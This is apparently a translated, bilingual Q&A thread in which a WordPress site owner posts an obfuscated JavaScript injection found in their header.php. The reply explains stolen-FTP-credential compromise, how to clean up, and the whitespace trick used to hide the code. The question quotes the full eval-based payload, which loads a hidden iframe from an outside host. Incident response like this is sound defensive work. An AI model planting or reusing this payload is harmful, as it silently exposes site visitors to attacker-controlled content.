需要找出恶意Javascript如何注入到我的header.php Wordpress主题文件中
[英]Need to find out how malicious Javascript was injected into my header.php Wordpress theme file
问题描述
Unfortunately my site was blocked for containing Malicious Javascript by AVG and Google. 
不幸的是,AVG和Google阻止了我的网站包含恶意Java脚本。 The malicious code pasted below, was somehow injected into the header.php theme file on the latest version of Wordpress. 下面粘贴的恶意代码以某种方式被注入到最新版本的Wordpress的header.php主题文件中。 I checked all the files and removed any suspicious looking plugins to make sure this doesn't happen again. 我检查了所有文件,并删除了所有可疑插件,以确保不再发生这种情况。 The theme is from a very reputed vendor, so I cant see it happening because of the Theme. 该主题来自一个非常有名的供应商,因此由于该主题,我无法看到它的发生。 I am looking to know how this was done so that it doesnt happen again. 我想知道这是怎么做的,这样就不会再发生了。
Host: 1&1 Hosting WordPress: 3.5.1 PHP: 5.2.17 Running on: Apache 主机:1&1主机WordPress:3.5.1 PHP:5.2.17运行于:Apache
Here is the malicious code: 这是恶意代码:
<script type="text/javascript" language="javascript">
ss=eval("Str"+"ing");d=document;a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,174,174,176,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,174,174,176,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,150,151,161,163,62,147,163,162,170,166,163,160,145,150,161,155,162,155,167,170,166,145,170,155,172,163,62,162,151,170,63,150,170,150,62,164,154,164,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,174,174,176,162,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,174,174,176,162,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,174,174,176,162,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,174,174,176,162,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>
1 个解决方案
解决方案1
0 2013-05-14 10:37:41
The code you posted above is usually an indication of stolen FTP credentials. 您上面发布的代码通常表示FTP凭据被盗。
I'm not certain if 1and1 gives you access to FTP logs, but if so, look in there. 我不确定1and1是否允许您访问FTP日志,但是如果是,请在其中查看。 You may find proof. 您可能会找到证明。 But we've cleaned over 160,000 websites and we've seen that exact code in sites where we do have access to the FTP logs and in every case it's been stolen FTP credentials. 但是,我们已经清理了160,000多个网站,并且已经在可以访问FTP日志的站点中看到了确切的代码,并且在每种情况下,这些代码都被盗了FTP凭据。
The hackers know that many people have FTP access to websites. 黑客知道许多人可以通过FTP访问网站。 So their viruses are designed to steal FTP passwords. 因此,他们的病毒旨在窃取FTP密码。 First, change all passwords. 首先,更改所有密码。 Then don't login until after you've run a full virus scan of your computer. 然后,直到对计算机运行了完整的病毒扫描之后,才能登录。 Don't give out the new passwords until others have run a full system virus scan of their computer. 在其他人对其计算机进行了完整的系统病毒扫描之前,不要提供新密码。
A good virus cleaner is Malwarebytes. 一个好的病毒清除程序是Malwarebytes。
One thing you should do is to search all files for the string: 44,152,171 (in your case). 您应该做的一件事是在所有文件中搜索字符串:44,152,171(针对您的情况)。 The reason is that while you'll find the above code in .htm/.html/.js files, in .php files the hackers use mostly the same code, but it's "echo'd" so many of the special characters are escaped in the .php code. 原因是,虽然您可以在.htm / .html / .js文件中找到上述代码,但在.php文件中,黑客使用的代码几乎相同,但是由于“回声”,所以许多特殊字符都被转义了在.php代码中。
You'll see maybe an opening php tag <?php or short version <? 您可能会看到一个开头的php标签<?php或简短版本<? followed by a series of spaces then an identifier #879076# (for instance) then more spaces then "echo " followed by more spaces and then the opening script tag. 然后是一系列空格,然后是标识符#879076#(例如),然后是更多空格,然后是“ echo”,接着是更多空格,然后是打开脚本标签。
The added spaces are designed to try and hide the malicious code to off the screen when viewed with a text editor. 添加的空间旨在尝试在使用文本编辑器查看时将恶意代码隐藏在屏幕之外。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.